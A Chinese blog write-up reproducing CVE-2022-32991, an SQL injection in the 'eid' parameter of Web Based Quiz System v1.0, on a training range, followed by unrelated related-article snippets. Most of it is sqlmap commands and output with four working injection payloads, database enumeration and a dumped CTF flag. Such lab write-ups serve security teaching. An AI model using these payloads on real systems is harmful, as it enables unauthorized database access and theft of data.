Web Based Quiz System v1.0 SQL 注入漏洞(CVE-2022-32991)

前言

CVE-2022-32991 是一个影响 Web Based Quiz System v1.0 的 SQL 注入漏洞。这个漏洞存在于 welcome.php 文件中的 eid 参数处。攻击者可以通过此漏洞在数据库中执行任意 SQL 语句,从而获取、修改或删除数据库中的数据。

具体细节如下:

  • 攻击向量:网络(NETWORK)
  • 攻击复杂度:低(LOW)
  • 所需权限:低(LOW)
  • 用户交互:无(NONE)
  • 影响:高(机密性、完整性、可用性均受影响)

根据 CVSS v3 的评分,该漏洞的基础得分为 8.8(高),而在 CVSS v2 中,该漏洞的评分为 6.5(中)。这表明该漏洞在被利用时会对系统造成严重影响。

漏洞的主要原因是没有正确地对输入进行过滤和转义,从而使得恶意用户能够插入和执行恶意的 SQL 语句。为了防止这种类型的攻击,应确保在处理用户输入时使用预编译语句(prepared statements)或存储过程,并严格验证和转义所有用户输入。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

  1. 实战演练

    • 提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
    • 场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
  2. 漏洞复现

    • 用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
    • 通过实战操作,帮助用户掌握漏洞利用和防护的技能。
  3. 教学培训

    • 提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
    • 包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
  4. 竞赛与评测

    • 定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
    • 提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
  5. 资源共享

    • 平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
    • 用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Web Based Quiz System v1.0 是一个使用 PHP 和 MySQLi 构建的在线考试系统,旨在简化学生的考试过程并减少执行考试所需的人工。这套系统允许用户(学生)注册和登录,参加考试,而管理员则能够查看和管理用户、排名以及试题。

系统功能

管理员功能:

  • 首页
  • 查看用户
  • 管理测验
  • 查看排名

学生功能:

  • 注册
  • 登录
  • 参加测验
  • 查看分数
  • 查看排名
  • 注销

系统设置步骤

  1. 下载 zip 文件。
  2. 下载并安装 XAMPP。
  3. 运行 XAMPP 控制面板,启动 MySQL 和 Apache。
  4. 将下载的 zip 文件解压到 C:\xampp\htdocs 文件夹中。
  5. 打开浏览器并进入 http://localhost/phpmyadmin/ 创建数据库。
  6. 新建数据库命名为 sourcecodester_exam
  7. 导入 SQL 文件,选择 onlinequiz 文件夹中的相应文件。
  8. 点击 "Go" 进行导入。

运行系统

管理员账户访问路径为 http://localhost/onlinequiz/admin.php,默认用户名为 [email protected],密码为 admin。学生则可以通过 http://localhost/onlinequiz/ 进行注册和登录。

该系统主要用于教育目的,用户可以根据需求进行修改和扩展​ (NVD)​​ (SourceCodester)​。

漏洞复现

打开靶场

点击按钮注册

填写表格后提交 

使用刚注册的账号登录 

点击图中任意按钮跳转

发现了参数 eid(这三个页面的 eid 都不相同,最后两个页面的 n 和 t 相同)

打开 BurpSuite 拦截抓包

保存下值方便绕过身份验证

Cookie: PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

使用工具 SQLMap 开始渗透:

──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch --dbs_____H_____ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:03:02 /2024-06-29/[19:03:03] [INFO] testing connection to the target URL
[19:03:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:03:03] [INFO] testing if the target URL content is stable
[19:03:03] [INFO] target URL content is stable
[19:03:03] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[19:03:03] [INFO] heuristic (XSS) test shows that GET parameter 'eid' might be vulnerable to cross-site scripting (XSS) attacks
[19:03:03] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:03:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:03:04] [WARNING] reflective value(s) found and filtering out
[19:03:04] [INFO] GET parameter 'eid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="How")
[19:03:04] [INFO] testing 'Generic inline queries'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] GET parameter 'eid' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[19:03:05] [INFO] testing 'MySQL inline queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:03:05] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[19:03:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:03:16] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:03:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:03:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:03:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:03:16] [INFO] target URL appears to have 5 columns in query
[19:03:16] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:03:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:03:16] [INFO] fetching database names
[19:03:17] [INFO] retrieved: 'information_schema'
[19:03:17] [INFO] retrieved: 'performance_schema'
[19:03:17] [INFO] retrieved: 'mysql'
[19:03:17] [INFO] retrieved: 'ctf'
available databases [4]:                                                                                                                                               
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema[19:03:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:03:17 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" --tables_____H_____ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:05:38 /2024-06-29/[19:05:38] [INFO] resuming back-end DBMS 'mysql' 
[19:05:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:05:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:05:39] [INFO] fetching tables for database: 'ctf'
[19:05:39] [WARNING] reflective value(s) found and filtering out
[19:05:39] [INFO] retrieved: 'user'
[19:05:39] [INFO] retrieved: 'options'
[19:05:39] [INFO] retrieved: 'quiz'
[19:05:40] [INFO] retrieved: 'admin'
[19:05:40] [INFO] retrieved: 'questions'
[19:05:40] [INFO] retrieved: 'history'
[19:05:40] [INFO] retrieved: 'rank'
[19:05:40] [INFO] retrieved: 'flag'
[19:05:40] [INFO] retrieved: 'answer'
Database: ctf                                                                                                                                                          
[9 tables]
+-----------+
| admin     |
| history   |
| options   |
| rank      |
| user      |
| answer    |
| flag      |
| questions |
| quiz      |
+-----------+[19:05:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:05:40 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" --columns_____H_____ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:06:22 /2024-06-29/[19:06:22] [INFO] resuming back-end DBMS 'mysql' 
[19:06:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:06:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:06:23] [INFO] fetching columns for table 'flag' in database 'ctf'
[19:06:23] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+[19:06:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:06:23 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" -C "flag" --dump_____H_____ ___[)]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:07:10 /2024-06-29/[19:07:10] [INFO] resuming back-end DBMS 'mysql' 
[19:07:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:07:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:07:10] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[19:07:10] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{7ba28499-362a-43b4-be35-1f92bae73ef5} |
+--------------------------------------------+[19:07:10] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[19:07:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:07:10 /2024-06-29/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/368426.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

无人机森林火灾解决方案

森林火灾解决方案 森林火灾特点 森林火灾发生突然、蔓延迅速、难以控制&#xff0c;应对难度系 数很高&#xff0c;扑救工作十分困难 救援面临的挑战 • 林区交通不便&#xff0c; 山高坡陡&#xff0c; 沟壑纵横&#xff0c;难以及时侦查、 定位、扑灭 • 火灾发生的区域…

基于opencv的斜光测距及python实现

1.前言 最近做了一个基于opencv的斜光测距的小项目&#xff0c;东西不多&#xff0c;但是很有意思&#xff0c;值得拿出来学一学。项目里面需要比较精确的定位功能&#xff0c;将前人matlab代码移植到python上&#xff0c;并且做了一些优化&#xff0c;简化逻辑(毕竟我是专业的…

马工程刑法期末复习笔记重点2

马工程刑法期末复习笔记重点2

【JavaWeb程序设计】环境配置和Web工程的创建

目录 一、安装JDK、Tomcat&#xff0c;进行测试Tomcat能否正常启动。 二、修改Tomcat端口为8976&#xff0c;重新进行测试 三、使用集成开发环境Intelligent Idea&#xff0c;绑定JDK和Tomcat&#xff0c;建立站点&#xff0c;并测试 四、编写一个简单的html页面&#xff0…

微信小程序遮罩层显示

效果展示&#xff1a; wxml页面&#xff1a; <view classmodal-mask wx:if{{showModal}}><view class"modal-container"><view classmodal-content></view><view classmodal-footer bindtap"closeImage">//这个/images/ind…

SpringMVC的架构有什么优势?——控制器(一)

文章目录 控制器(Controller)1. 控制器(Controller)&#xff1a;2. 请求映射(Request Mapping)&#xff1a;3. 参数绑定(Request Parameters Binding)&#xff1a;4. 视图解析器(View Resolver)&#xff1a;5. 数据绑定(Data Binding)&#xff1a;6. 表单验证(Form Validation)…

Workerman在线客服系统源码,附搭建教程

源码介绍&#xff1a; Workerman在线客服系统源码。 workerman是一个高性能的PHP socket 服务器框架&#xff0c;workerman基于PHP多进程以及libevent事件轮询库&#xff0c;PHP开发者只要实现一两个接口&#xff0c;便可以开发出自己的网络应用&#xff0c;例如Rpc服务、聊天…

leetCode.98. 验证二叉搜索树

leetCode.98. 验证二叉搜索树 题目描述 代码 /*** Definition for a binary tree node.* struct TreeNode {* int val;* TreeNode *left;* TreeNode *right;* TreeNode() : val(0), left(nullptr), right(nullptr) {}* TreeNode(int x) : val(x), left(n…

秋招Java后端开发冲刺——并发篇2(JMM与锁机制)

本文对Java的内存管理模型、volatile关键字和锁机制进行详细阐述&#xff0c;包括synchronized关键字、Lock接口及其实现类ReentrantLock、AQS等的实现原理和常见方法。 一、JMM&#xff08;Java内存模型&#xff09; 1. 介绍 JMM定义了共享内存中多线程程序读写操作的行为规…

51单片机第18步_将TIM0用作13位定时器

本章重点学习将TIM0用作13位定时器。 1、定时器0工作在模式0框图 2、定时器0工作在模式0举例 1、Keil C51中有一些关键字&#xff0c;需要牢记&#xff1a; interrupt 0&#xff1a;指定当前函数为外部中断0&#xff1b; interrupt 1&#xff1a;指定当前函数为定时器0中断…

【C语言】union 关键字

在C语言中&#xff0c;union关键字用于定义联合体。联合体是一种特殊的数据结构&#xff0c;它允许不同的数据类型共享同一段内存。所有联合体成员共享同一个内存位置&#xff0c;因此联合体的大小取决于其最大成员的大小。 定义和使用联合体 基本定义 定义一个联合体类型时…

ubuntu20.04配置调试工具

1.准备工作&#xff1a;安装g或者gdb sudo apt updatesudo apt install gg --versionsudo apt install gdbgdb --version 2.配置环境 2.1在本地新建一个main.cpp #include <iostream> #include <vector> #include <string>using namespace std;int main(…

克隆gitee仓库,在vs2022创建文件夹开发项目操作步骤

git网站 git知识大全 git教程&#xff1a;廖雪峰的官方网站 git菜鸟教程 gitee之创建项目步骤 同步源仓库 2. 克隆命令 3. 右击git Bash Here>粘贴命令行 4. 选中项目文件夹》创建本人文件夹&#xff08;ZYY&#xff09; 5. 打开vs2022》新建项目》选择Framework》下…

C++精解【10】

文章目录 读写文件概述example csv读文件读取每个字段读取机器学习数据库iris constexpr函数GMP大整数codeblock环境配置数据类型函数类 EigenminCoeff 和maxCoeffArray类 读写文件 概述 fstream typedef basic_fstream<char, char_traits<char>> fstream;此类型…

VSCode常用的一些插件

Chinese (Simplified) 汉语&#xff08;简体&#xff09;拓展包。 Auto Close Tag 可以自动增加xml/html的闭合标签。 CodeSnap 截图神器。截图效果在下面。 Dracula Official vscode一个很好看的主题。 Git Graph git管理工具。 GitHub Repositories 有了它&#xff0c;不…

前端利用vue如何实现导入和导出功能.md

1. 前端利用vue如何实现导入和到处功能 1.1. 导入功能&#xff08;以导入Excel文件为例&#xff09; 1.1.1. 实现步骤: 1.1.1.1. 安装依赖: 首先&#xff0c;你需要安装处理Excel文件的库&#xff0c;如xlsx。1.1.1.2. 创建上传组件: 使用Element UI的<el-upload>组件或其…

Qt:5.QWidget属性介绍(Enabled属性-控件可用性设置、geometry属性-控件位置/大小设置)

目录 一、 QWidget属性的介绍&#xff1a; 二、Enabled属性-控件可用性设置&#xff1a; 2.1Enabled属性的介绍&#xff1a; 2.2获取控件当前可用状态的api——isEnabled()&#xff1a; 2.3设置控件当前的可用状态的api—— setEnabled() &#xff1a; 2.4 实例&#xff…

git提交实战

以新项目为例&#xff0c;如何在新项目新分支提交代码。 1.查看文件所在位置 git init 2.克隆项目到本地并完成身份配置 3.将需要新增的文件放到指定目录路径下 4.进入新克隆的文件 cd XXX 5.切换分支 git checkout XXX 6.标红者即为新提交的文件 git status 7.加入 git …

Is ChatGPT a Good Personality Recognizer? A Preliminary Study?

ChatGPT是一个很好的人格识别者吗&#xff1f;初步调研 摘要1 介绍2 背景和相关工作3 实验3.1 数据集3.2 提示策略3.3 基线3.4 评估指标3.5 实现细节3.6 Overall Performance (RQ1)3.7 ChatGPT在人格识别上的公平性 (RQ2)3.8 ChatGPT对下游任务的人格识别能力&#xff08;RQ3&a…

linux——IPC 进程间通信

IPC 进程间通信 interprocess communicate IPC&#xff08;Inter-Process Communication&#xff09;&#xff0c;即进程间通信&#xff0c;其产生的原因主要可以归纳为以下几点&#xff1a; 进程空间的独立性 资源隔离&#xff1a;在现代操作系统中&#xff0c;每个进程都…